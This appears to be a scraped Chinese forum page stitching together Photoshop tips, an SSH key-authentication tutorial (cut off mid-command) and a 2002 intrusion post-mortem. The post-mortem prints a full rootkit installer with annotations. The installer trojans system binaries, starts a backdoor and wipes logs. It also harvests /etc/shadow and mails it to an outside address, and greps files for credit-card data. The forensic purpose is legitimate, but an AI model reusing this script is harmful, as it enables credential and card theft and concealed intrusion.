137. 我们需要多层选择时,可以先用选择工具选定文件中的区域,拉制出一个选择虚框;然后按住“Alt”键,当光标变成一个右下角带一小“-”的“+”号时(这表示减少被选择的区域或像素),在第一个框的里面拉出第二个框;而后按住“ Shift”键,当光标变成一个右下角带一小“+”的大“+”号时,再在第二个框的里面拉出第三个选择框,这样二者轮流使用,就可以进行多层选择了。用这种方法也可以选择不规则对象。

138. 按Shift+“+”键( 向前 )和Shift+“-”键( 向后 )可在各种层的合成模式上切换。我们还可以按Alt+Shift+“某一字符”快速切换合成模式。
  N = 正常 (Normal)
  I = 溶解 (Dissolve)
  M = 正片叠底 (Multiply)
  S = 屏幕 (Screen)
  O = 叠加 (Overlay)
  F = 柔光(Soft Light)
  H = 强光(Hard Light)
  D = 颜色减淡 (Color Dodge)
  B = 颜色加深 (Color Burn) K = 变暗 (Darken)
  G = 变亮 (Lighten)
  E = 差值(Difference)
  X = 排除 (Exclusion)
  U = 色相 (Hue)
  T = 饱和度 (Saturation) C = 颜色 (Color)
  Y = 亮度(Luminosity) Q = 背后(Behind 1)
  L = 阈值(Threshold 2)
  R = 清除 (Clear 3)
  W = 暗调(Shadows 4)
  V = 中间调(Midtones 4)
  Z = 高光(Highlights 4)

图像处理技巧

149. 按下Ctrl键,用鼠标点击预览区域,图像放大;按下Alt键,用鼠标点击预览区域,图像缩小。

150. 制作透明背景的图片
一般来说,网络中的透明背景的图片都是GIF格式的,在Photoshop中您可以先使用指令“图像”→“模式”→“索引颜色”将图片转成256色,再使用指令FileExportGIF89a

2008/12/13 21:57
应用扩展 工具箱


人来疯SSH普及系列文章
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线
http://www.chinaunix.net 作者:初学vb 发表于:2005-01-07 11:55:02

一、SSH客户端之SSH Secure Shell 的连接方法

1、运行环境
WINDOWS下安装SSH客户端,名字是SSHSecureShellClient-3.2.9.exe,可以到http://www.ssh.com/下载,当然了,在SERVER端我们也可以安装Openssh,但此文章着重介绍的是ssh的技术,所以我们使用的是http://www.ssh.com/ for UNIX/LINUX 的SERVER 端,现在最新版本是ssh-3.2.9-1.i386.rpm(如果你是AIX或者SOLARIS,要下不同的版本,这里以RHCE3为例子)。确定把UNIX类主机的默认的Openssh全部卸载掉后安装ssh-3.2.9-1.i386.rpm。

2、为什么要公私钥认证方法(连接到主机不输入密码)
我们需要知道Publick Key是指公钥,而private key是指私钥。认证的过程是这样的:public key对数据进行加密而且只能用于加密,private key只能对所匹配的public key加密过的数据进行解密。我们把public key放在远程系统合适的位置,然后从本地开始进行ssh连接。此时,远程的sshd会产生一个随机数并用我们产生的public key进行加密后发给本地,本地会用private key进行解密并把这个随机数发回给远程系统。最后,远程系统的sshd会得出结论――我们拥有匹配的private key允许我们登录。就这么简单!

3、在本机生成密钥过程
WINDOWS下寻找ssh-keygen2.exe文件,这是生成密钥的文件,我的在C:\Program Files\SSH Communications Security\SSH Secure Shell,在DOS下执行这个文件,方法是
C:\Program Files\SSH Communications Security\SSH Secure Shell> ssh-keygen2 -t rsa
我用的是rsa的密钥,默认是2048位,足够我们用的了,还可以使用dsa方式的密钥。我就不在这里说明了
系统自动生成密钥对,默认放在C:\Documents and Settings\XXX\Application Data\SSH\UserKeys目录下,其中XXX是你执行程序时用的帐户,默认名称是id_rsa_2048_a和id_rsa_2048_a.pub,而后者就是我们要传到服务器上的公钥。(生成密钥对的同时让你输入一个密码,因为我们想不输入密码直接登陆服务器,所以就直接回车了,但如果你想更安全一些,还是建议你在这里也输入密码。)

4、用SSH客户端从本机登陆到远程UNIX类服务器上
我们还按以前的方法登陆到远程UNIX类服务器上,这样登陆后我们会在用户目录下,PWD一下,你可以看到你的用户目录路径,比如我的就是/home/test,那么好了,我们建立一个.ssh2的文件夹,在里面建立一个文件,authorization,内容如下:
key id_rsa_2048_a.pub
然后把你WINDOWS客户端上的id_rsa_2048_a.pub上传到你在UNIX类服务器上刚建立好的.ssh2文件夹下,关闭SSH客户端。

5、用SSH客户端公钥认证状态登陆
重新启动SSH客户端,在登陆认证状态栏选择Public Key方式,登陆到你刚才放id_rsa_2048_a.pub的那台服务器,你会发现你马上就登陆进来了,没有密码限制了。这个时候用公私钥认证和用密码认证同时存在,还没有达到我们的要求,那我们就在UNIX类服务器上修改/etc/ssh2/sshd2_config文件

把以下如下三行的password 删除,下面这三行是修改好的
AllowedAuthentications publickey
AllowedAuthentications hostbased,publickey
RequiredAuthentications publickey

这样当你再用密码登陆的时候就出现如下对话框了!!

第二章 SSH客户端之Putty的连接方法

1、运行环境
WINDOWS下安装的SSH客户端,名字是putty-0.56-installer.exe,可以到如下地址下载:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html,这个安装包是所有工具的集合,其实如果只做为连接用,你可以只下putty0.56.exe的。但我们这里因为要做密钥对,所以就下整个包安装吧。

2、在本机生成密钥过程
用putty套装的puttygen来产生密钥。密钥的类型选择SSH2 RSA。密钥的位数选择2048,然后点击"Generator",此时密钥生成当然也有几个选项出现。如果你有不止一个key,你可以在“Key comment”作注释用于区别其他的key。“Key passphrase“和“Confirm passphrase“用于对硬盘上的key进行加密,如过你自己一个人用机器觉得安全有保障的话可以让它们为空。然后保存两个key,用默认方式保存,那么公钥你可以指定文件名,私钥默认的文件扩展名是.ppk。在这里我们命名它为test.ppk,而公钥我们保存为test.pub,需要注意的是,如果用putty连接,私钥的扩展名必须是.ppk,而且你还可以将这个.ppk的私钥保存为SSH Secure Shell 格式和Openssh格式认知的私钥,这个对两个UNIX类主机之间相互通信提供了很大帮助。(我们以后会将两个UNIX类主机通过公私钥认证的方法给大家讲讲)

4、用Putty从本机登陆到远程UNIX类服务器上
我们还按先前的方法登陆到远程UNIX类服务器上,这样登陆后我们会在用户目录下,PWD一下,你可以看到你的用户目录路径,比如我的就是/home/test,那么好了,我们建立一个.ssh2的文件夹,在里面建立一个文件,authorization,内容如下:
key test.pub
然后把你WINDOWS客户端上的test.pub上传到你在UNIX类服务器上刚建立好的.ssh2文件夹下,关闭Putty。这个上传命令你可以用 put ,下载就用get。你的通道可以用PSFTP建立,这个也在PUTTY的组件中。

5、用SSH客户端公钥认证状态登陆
重新启动Putty,建立一个session命名为test,设定你要登陆的远程ip,协议设为ssh,Connection设定在ssh的auth选项中,将private key的文件选择为刚才我们由puttygen产生的密钥test.ppk。点Open,要求输入username,我们输入用户名后远程系统开始public key认证,如果密钥有passphrase 则需要输入,否则直接就登录了。这个时候用公私钥认证和用密码认证同时存在,还没有达到我们的要求,那我们就在UNIX类服务器上修改/etc/ssh2/sshd2_config文件

把以下如下三行的password 删除,下面这三行是修改好的
AllowedAuthentications publickey
AllowedAuthentications hostbased,publickey
RequiredAuthentications publickey

这样当你再用密码登陆的时候就出现如下对话框了!

第三章
Ssh服务器端安装
1、环境:
因为我们选用的SSH服务器是http://www.ssh.com 的SSH Secure Shell for unix类产品,所以我们主要介绍一下此类的Ssh服务器的安装过程。(SSH有两个版本,我们现在介绍的是版本2;Openssh就不介绍了,大家有兴趣的话可以参考一下网上文章)

2、编译安装
我们前面介绍过,现在的Ssh server for unix 类的最新版本是ssh-3.2.9-1,我建议大家用官方提供的TAR包,当然,如果你不熟悉编译过程,用RPM等安装方式也是可以的。如果用RPM安装,请先下载ssh-3.2.9-1.i386.rpm , 大家可以到以下地址下载:
http://ftp.ssh.com/priv/secureshell/3 ... inux/ssh-3.2.9-1.i386.rpm
安装时请用管理员权限
# rpm

2008/12/13 21:57
应用扩展 工具箱


《Linux命令大全(修改版)》CHM格式
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线
《Linux命令大全(修改版)》CHM格式

下载

附件:


rar shell.rar 大小: 318.73 KB; 下载次数: 1622

2008/12/13 21:57

sun 于 2005年02月08日 00:02:50
gipsky 于 2005年03月24日 00:24:49
gipsky 于 2005年03月24日 01:12:45
gipsky 于 2005年03月25日 05:25:00
gipsky 于 2005年03月25日 08:59:47
应用扩展 工具箱


网友文章:一Linux系统的入侵分析 (2002年6月11日)
新进会员
注册日期:
1970/1/1 8:00
所属群组:
注册会员
帖子: 5
等级: 1; EXP: 34
HP : 0 / 8
MP : 1 / 1279
离线
我的一次入侵分析


本来也不知道自己的机器有人进来了,因为放在内部,能经过NAT进来的几乎是
不可能的,但无意登陆机器随便看看,发现有个glibc的动态库不见了,立刻到
message
那看看,什么都没有。FT,立刻启动备份机器,把硬盘拔出来,插到我的其他服务
器上检查。唉,果然。。。

[root@mail a]# la- la
bash: la-: command not found
[root@mail a]# ls -la
total 704
drwxr-xr-x 23 root root 4096 Feb 2 08:08 .
drwxr-xr-x 7 root root 4096 Feb 5 18:15 ..
drwxr-xr-x 2 root root 4096 Oct 27 1999 .automount
drwxr-xr-x 2 root root 4096 Nov 23 20:26 CVS
drwxr-xr-x 2 root root 4096 Feb 2 08:08 bin
drwxr-xr-x 2 root root 4096 Feb 3 17:55 boot
drwxr-xr-x 2 root root 4096 Nov 23 22:04 command
-rw------- 1 root root 241664 Jan 28 23:01 core
就是这里溢出啦,看来是FTP或者SSH的问题,内部实验机器,内部IP
就懒得升级,结果。。。等下再gdm你好了。

drwxr-xr-x 7 root root 36864 Feb 2 08:08 dev
-rw-r--r-- 1 root root 330646 Feb 2 08:08 eddyrk.tar.gz
真要命,直接放,搞不懂是高手失误还是只会用别人的程序。
drwxr-xr-x 38 root root 4096 Feb 4 23:23 etc
drwxr-xr-x 2 root root 4096 Nov 23 20:20 home
drwxr-xr-x 4 root root 4096 Nov 23 20:30 lib
drwxr-xr-x 2 root root 16384 Nov 23 20:20 lost+found
drwxr-xr-x 2 root root 4096 Oct 31 1999 misc
drwxr-xr-x 4 root root 4096 Nov 23 20:26 mnt
drwxr-xr-t 3 root root 4096 Nov 23 22:03 package
dr-xr-xr-x 2 root root 4096 Feb 7 1996 proc
drwxr-xr-x 2 qmails 507 4096 Dec 14 21:40 rk
就是这个rootkit!看来很多人用这个呢
drwxr-xr-x 6 root root 4096 Feb 2 23:46 root
drwxr-xr-x 3 root root 4096 Feb 2 08:08 sbin
看到这2个目录没有,已经给改动过了,不可信任。

drwxr-xr-x 2 root root 4096 Nov 23 21:40 service
drwxrwxrwt 3 root root 4096 Feb 4 23:01 tmp
drwxr-xr-x 16 root root 4096 Nov 23 20:29 usr
drwxr-xr-x 2 root root 4096 Nov 23 20:20 var
[root@mail a]# date
星期二 02 5 18:28:17 CST 2002




[root@mail rk]# cat install
#!/bin/sh
unset HISTFILE
STARTDIR=`pwd`
CARDLOG="/usr/lib/locale/ro_RO/uboot/card.log"
这个程序的作者真不是人,连别人的信用卡都偷!

SMP=`uname -a | grep smp | wc -l`
还真的没考虑过入侵需要考虑是否SMP呢
clear
echo "***** \dev\hda1`s aka Mithra`s rootkit *****"
echo "* greetz 2 bogonel and Amorph|s *"
echo "* This is the RedHat 7.0 build *"
echo "********************************************"
sleep 2
clear
echo "Please wait while Setup is preparing your directory ... "
sleep 5
clear
echo "Heh, sounds like f***in' Windoze, doesn't it ? :) "
sleep 2
clear
DIR="/usr/lib/locale/ro_RO/uboot"
mkdir -p $DIR
mkdir -p $DIR/etc

cp -f * $DIR/ >>/dev/null 少有的清空方式,这样就没办法追查INODE了。
cd $DIR

echo "Installing trojaned system files ..."

echo "[*] Process tools ..."
替换查看进程命令,FT
echo " |---ps"
chattr -aiu /bin/ps
./sz /bin/ps ps
mv -f ps /bin/ps
chattr +aiu /bin/ps
echo " | \\"
echo " | |-- done replacing ps "

sleep 1

echo " |---pstree"
chattr -aiu /usr/bin/pstree
./sz /usr/bin/pstree pstree
mv -f pstree /usr/bin/pstree
chattr +aiu /usr/bin/pstree
echo " | \\"
echo " | |-- done replacing pstree "

sleep 1

echo " |---top"
chattr -aiu /usr/bin/top
./sz /usr/bin/top top
mv -f top /usr/bin/top
chattr +aiu /usr/bin/top
echo " | \\"
echo " | |-- done replacing top "
echo " |----|"
sleep 5

echo "[*] Network tools ..."
替换网络命令,FT,毒
echo " |---netstat"
chattr -aiu /bin/netstat
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
chattr +aiu /bin/netstat
echo " | \\"
echo " | |-- done replacing netstat "

sleep 1

echo " |---ifconfig"
chattr -aiu /sbin/ifconfig
./sz /sbin/ifconfig ifconfig
mv -f ifconfig /sbin/ifconfig
chattr +aiu /sbin/ifconfig
echo " | \\"
echo " | |-- done replacing ifconfig "

#echo " |---inetd"
贱啊,什么都换了

#chattr -aiu /usr/sbin/inetd
#./sz /usr/sbin/inetd inetd
#mv -f inetd /usr/sbin/inetd
#chattr +aiu /usr/sbin/inetd
#echo " | \\"
#echo " | |-- done replacing inetd "

sleep 1

echo " |---tcpd"
chattr -aiu /usr/sbin/tcpd
./sz /usr/sbin/tcpd tcpd
mv -f tcpd /usr/sbin/tcpd
chattr +aiu /usr/sbin/tcpd
echo " | \\"
echo " | |-- done replacing tcpd "
echo " |----|"
sleep 1

echo "[*] Filesystem tools ..."
换了查找命令
echo " |---find"
chattr -aiu /usr/bin/find
./sz /usr/bin/find find
mv -f find /usr/bin/find
chattr +aiu /usr/bin/find
echo " | \\"
echo " | |-- done replacing find "

sleep 1

echo " |---ls"
chattr -aiu /bin/ls
./sz /bin/ls ls
mv -f ls /bin/ls
chattr +aiu /bin/ls
echo " | \\"
echo " | |-- done replacing ls "
echo " |----|"

echo " |---dir"
chattr -aiu /usr/bin/dir
./sz /usr/bin/dir dir
mv -f dir /usr/bin/dir
chattr +aiu /usr/bin/dir
echo " | \\"
echo " | |-- done replacing dir "
echo " |----|"

sleep 1

echo "[*] System tools ..."

echo " |---syslogd"
chattr -aiu /sbin/syslogd
./sz /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chattr +aiu /sbin/syslogd
echo " | \\"
echo " | |-- done replacing syslog "
echo " |----|"

删除所有log文件,不过这里写得不好。
用不删除,清内容更好。
rm -f /var/log/messages
touch /var/log/messages
/etc/rc.d/init.d/syslog restart
sleep 1

echo "[*] Placing configuration files in $DIR/etc/ ..."
mv -f netstatrc $DIR/etc/netstatrc
mv -f procrc $DIR/etc/procrc
mv -f filerc $DIR/etc/filerc
mv -f logrc $DIR/etc/logrc
sleep 1

开始编译外挂进程了,还好,不是LKM
echo "[*] Trying to install ADORE ..."
if [ -x /usr/bin/gcc ];
then
echo "GCC is present"
if [ -d /usr/src/linux ];
then
if [ $SMP -eq 0 ];
then
echo "We have a machine without SMP support"
cp -f Makefile.non-smp Makefile
else
echo "This machine supports SMP"
cp -f Makefile.smp Makefile
fi
make
mv -f ava /usr/bin/weather
还改头换面呢,呵呵~~
rm -f *.c *.h Makefile*
echo "ADORE is now installed ..."
else
echo "Kernel sources are not installed. Cannot install ADORE !"
fi
else
echo "GCC is not installed. Cannot install ADORE !"
fi

echo "[*] Replacing /etc/rc.d/init.d/network with ours ..."
mv -f network /etc/rc.d/init.d/network
sleep 5
mv -f twist2open /usr/bin/
echo "[*] Starting services ..."
#echo " |---backdoor ..."
#echo " |---sniffer ..."
加了后门还开SNIFFER,哼哼
#echo " |---bnc ..."
/usr/bin/twist2open &
echo " | \\"
echo " | |-- done"
echo " |----|"
rm -f ./*pid* /*pid* /*log*
sleep 5

echo "[*] Gathering system info ..."
echo " |---uname -a"
uname -a >>file
echo " |---ifconfig"
/sbin/ifconfig >>file
echo "|------" >>file
echo " |---passwd file"
cat /etc/passwd >>file
echo " |---shadow file"
echo "|------" >>file
cat /etc/shadow >>file
哇!!!!我的密码啊!!!!!!!
echo " |---ping statistics"
ping -c 5 216.115.108.245 >>file
echo " | \\"
echo " | |-- done"
echo "[*] Fixing vulns ..."
echo " |---.bash_history"
chattr +ia /root/.bash_history
聪明!的确要佩服这个作者了
echo " |---ftpd"
chmod -s /var/ftp/*
echo " |---rpc"
chmod -s /usr/bin/rpc*
chmod -s /usr/sbin/rpc*
chmod -s /sbin/rpc*
echo " |---named"
chmod -s /var/named
所有应用程序都加上了SUID,幸亏我从来不用默认的服务的
sleep 5
echo " | \\"
echo " | |-- done"
echo " |----|"
echo "[*] Cleaning logs. This will take a while ..."
开始清除LOG,进行收尾工作。
./logcleaner ftp >>/dev/null
./logcleaner rpc >>/dev/null
./logcleaner named >>/dev/null
./logcleaner yahoo >>/dev/null
./logcleaner bind >>/dev/null
./logcleaner geocities >>/dev/null
./logcleaner hypermart >>/dev/null
./logcleaner syslogd >>/dev/null
sleep 1
echo " | \\"
echo " | |-- done"
echo " |----|"
echo "[*] Mailing system information ..."
mail -s "`uname -a`" ja_ja_j@yahoo.com <file
把所有资料都MAIL出去,毒
rm -f file
cd $STARTDIR
rm -rf ../*rh*
echo "[*] Looking for cards ..."
touch $CARDLOG
egrep -ir 'mastercard|visa' /home|egrep -v cache >>$CARDLOG
egrep -ir 'mastercard|visa' /var|egrep -v cache >>$CARDLOG
egrep -ir 'mastercard|visa' /root|egrep -v cache >>$CARDLOG
if [ -d /www ];
then
egrep -ir 'mastercard|visa' /www|egrep -v cache >>$CARDLOG
fi
这些代码就很有问题了,我在怀疑作者的人格了。
echo "Rootkit successfully installed. Enjoy !"

继续分析
[root@mail log]# cat secure
Jan 28 23:28:17 dnscache in.ftpd[2767]: connect from 192.168.100.26
Jan 28 23:28:17 dnscache in.ftpd[2767]: error: cannot execute
/usr/sbin/in.ftpd: No such file or directory
Jan 30 04:44:05 dnscache in.telnetd[3891]: connect from 192.168.100.
141
Jan 30 17:41:17 dnscache in.telnetd[4199]: connect from 211.155.24.246
Jan 31 00:52:23 dnscache login: FAILED LOGIN 1 FROM (null) FOR , User
not known to the underlying authentication module
Jan 31 19:13:57 dnscache in.telnetd[872]: connect from 192.168.100.141
Feb 1 04:03:46 dnscache in.telnetd[1143]: connect from 192.168.100.25
Feb 1 04:12:23 dnscache in.telnetd[1166]: connect from 192.168.100.25
Feb 1 07:34:10 dnscache in.telnetd[1282]: connect from 211.155.24.246
Feb 2 07:05:13 dnscache in.telnetd[1927]: connect from 218.17.238.238
Feb 2 07:16:47 dnscache in.telnetd[1928]: connect from 218.17.238.238
~~~~~~~~~~~~~~~~~~~~~~~~~~~~问题来了,那是ADSL用户,而我是在内网
,怎么可能进来的?FT,要检讨内部安全问题了。

看一下wtmp先:恩。。。正常
pts/0
chair
192.168.100.25
pts/0
pts/0
chair
192.168.100.25
pts/0
pts/0
chair
211.155.24.246
pts/0
runlevel
tty1
\<#.
tty2
tty3
\<f/
tty4
tty5
\<x0
tty6
tty1
X.\<
tty1
chair
f.\<
reboot
runlevel
tty1
LOGIN

看看FTP的记录先,最讨厌FTP进来的人,只有自己。。。删了记录?
root@mail log]# cat xferlog
Fri Nov 23 21:17:31 2001 0 192.168.100.80 36975
/home/chair/daemontools-0.76.tar.gz b _ i r chair ftp 0 *
Fri Nov 23 21:17:32 2001 0 192.168.100.80 53019
/home/chair/ucspi-tcp-0.88.tar.gz b _ i r chair ftp 0 *
Fri Nov 23 21:17:34 2001 0 192.168.100.80 85648 /home/chair/djbdns-1.
05.tar.gz b _ i r chair ftp 0 *
Fri Nov 23 21:17:35 2001 0 192.168.100.80 28416
/home/chair/qmailanalog-0.70.tar.gz b _ i r chair ftp 0 *

[root@mail ssh-scan]#pwd
/mnt/c/var/tmp/ssh-scan
[root@mail ssh-scan]# ls -la
total 32
drwxr-xr-x 8 operator root 4096 Dec 2 08:22 .
drwxrwxrwt 3 root root 4096 Feb 2 08:23 ..
drwxr-xr-x 2 operator root 4096 Dec 2 08:07 bind
drwxr-xr-x 2 operator root 4096 Dec 2 08:07 ftpd
drwxr-xr-x 2 operator root 4096 Dec 2 08:07 lpd
drwxr-xr-x 2 operator root 4096 Jun 16 2001 rpc
drwxr-xr-x 2 operator root 4096 Jun 14 2001 src
drwxr-xr-x 4 operator root 4096 Jan 21 19:57 ssh

奇怪,应该是SCAN这些东西时候留下的文件锁,看来线索
还是不少,或者这个进来的家伙太粗心了。

[root@mail mail]# pwd
/mnt/c/spool/mail

[root@mail mail]#cat root |more
太多了,垃圾日志省去大部分

From root Sun Dec 2 05:01:00 2001
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id FAA23746
for root; Sun, 2 Dec 2001 05:01:00 +0800
Date: Sun, 2 Dec 2001 05:01:00 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200112012101.FAA23746@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 12/02/01:05.01 system check


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
*************** 问题大大的明显!!FT,我的错。
*** WARNING ***: Log file /var/log/messages is smaller than last time
checked!
*************** This could indicate tampering.
Dec 2 04:02:00 dnscache syslogd 1.3-3: restart.
Dec 2 04:02:01 dnscache syslogd 1.3-3: restart.
Dec 2 04:02:01 dnscache syslogd 1.3-3: restart.
***************
*** WARNING ***: Log file /var/log/secure is smaller than last time
checked!
*************** This could indicate tampering.
***************
*** WARNING ***: Log file /var/log/maillog is smaller than last time
checked!
*************** This could indicate tampering.


From root Sun Dec 9 04:02:01 2001
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id EAA11188
for root; Sun, 9 Dec 2001 04:02:01 +0800
Date: Sun, 9 Dec 2001 04:02:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200112082002.EAA11188@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: errors rotating logs

errors occured while rotating /var/log/httpd/access_log

httpd: no process killed
error running postrotate script


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
***************
*** WARNING ***: Log file /var/log/messages is smaller than last time
checked!
*************** This could indicate tampering.
Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
Dec 9 04:02:01 dnscache syslogd 1.3-3: restart.
***************
*** WARNING ***: Log file /var/log/secure is smaller than last time
checked!

From root Wed Jan 16 04:01:01 2002
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id EAA16976
for root; Wed, 16 Jan 2002 04:01:01 +0800
Date: Wed, 16 Jan 2002 04:01:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201152001.EAA16976@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/16/02:04.01 system check


Unusual System Events
=-=-=-=-=-=-=-=-=-=-=
Jan 16 03:41:35 dnscache sshd[16485]: log: Connection from 200.184.184.
51 port 3997
Jan 16 03:41:36 dnscache sshd[16485]: fatal: Did not receive ident
string. 扫描吧,哈哈~~

From root Mon Jan 21 18:01:01 2002
Return-Path: <root>
Received: (from root@localhost)
by dnscache.i-168.com (8.9.3/8.9.3) id SAA19794
for root; Mon, 21 Jan 2002 18:01:01 +0800
Date: Mon, 21 Jan 2002 18:01:01 +0800
From: root <root@dnscache.i-168.com>
Message-Id: <200201211001.SAA19794@dnscache.i-168.com>
To: root@dnscache.i-168.com
Subject: dnscache.i-168.com 01/21/02:18.01 ACTIVE SYSTEM ATTACK!

HOHO~~~~原来是SSH的问题,我的SSH是那个什么破STARLINUX自带的,
1.X吧,因为是实验机器,懒得升级,FT。问题来了
Active System Attack Alerts
=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
attack: network attack detected
Security Violations
=-=-=-=-=-=-=-=-=-=
Jan 21 17:39:18 dnscache sshd[18176]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:04 dnscache sshd[18224]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:18 dnscache sshd[18236]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:25 dnscache sshd[18241]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:33 dnscache sshd[18244]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:41:52 dnscache sshd[18252]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:06 dnscache sshd[18262]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:13 dnscache sshd[18265]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:26 dnscache sshd[18273]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:29 dnscache sshd[18276]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:32 dnscache sshd[18279]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:36 dnscache sshd[18280]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:39 dnscache sshd[18283]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:43 dnscache sshd[18286]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:46 dnscache sshd[18287]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:50 dnscache sshd[18290]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:53 dnscache sshd[18293]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:42:57 dnscache sshd[18294]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:00 dnscache sshd[18297]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:03 dnscache sshd[18300]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:07 dnscache sshd[18303]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:10 dnscache sshd[18304]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:43:18 dnscache sshd[18310]: fatal: Local: crc32 compensation
attack: network attack detected
Jan 21 17:35:47 dnscache sshd[18052]: log: Connection from 141.108.9.
13 port 4639
Jan 21 17:35:47 dnscache sshd[18053]: log: Connection from 141.108.9.
13 port 4648
Jan 21 17:35:49 dnscache sshd[18053]: fatal: Local: Your ssh version
is too old and is no longer supported. Pl
ease install a newer version.
原来是这个家伙!但IP很古怪,是不是肉鸡??

Jan 21 17:35:49 dnscache sshd[18056]: log: Connection from 141.108.9.
13 port 4651
Jan 21 17:36:36 dnscache sshd[18075]: log: Connection from 141.108.9.
13 port 4674
Jan 21 17:36:39 dnscache sshd[18078]: log: Connection from 141.108.9.
13 port 4676
Jan 21 17:36:42 dnscache sshd[18078]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:36:43 dnscache sshd[18079]: log: Connection from 141.108.9.
13 port 4679
Jan 21 17:36:46 dnscache sshd[18082]: log: Connection from 141.108.9.
13 port 4682
Jan 21 17:36:49 dnscache sshd[18082]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:36:50 dnscache sshd[18085]: log: Connection from 141.108.9.
13 port 4685
Jan 21 17:36:53 dnscache sshd[18085]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:36:53 dnscache sshd[18088]: log: Connection from 141.108.9.
13 port 4687
Jan 21 17:36:57 dnscache sshd[18089]: log: Connection from 141.108.9.
13 port 4690
Jan 21 17:37:00 dnscache sshd[18089]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:00 dnscache sshd[18092]: log: Connection from 141.108.9.
13 port 4692
Jan 21 17:37:04 dnscache sshd[18095]: log: Connection from 141.108.9.
13 port 4694
Jan 21 17:37:07 dnscache sshd[18095]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:08 dnscache sshd[18096]: log: Connection from 141.108.9.
13 port 4697
Jan 21 17:37:12 dnscache sshd[18099]: log: Connection from 141.108.9.
13 port 4699
Jan 21 17:37:24 dnscache sshd[18099]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:25 dnscache sshd[18106]: log: Connection from 141.108.9.
13 port 4705
Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9.
13 port 4708
Jan 21 17:37:28 dnscache sshd[18106]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:28 dnscache sshd[18109]: log: Connection from 141.108.9.
13 port 4708
Jan 21 17:37:31 dnscache sshd[18109]: fatal: Local: Corrupted check
bytes on input.
Jan 21 17:37:32 dnscache sshd[18110]: log: Connection from 141.108.9.
13 port 4712
Jan 21 17:37:36 dnscache sshd[18113]: log: Connection from 141.108.9.
13 port 4713
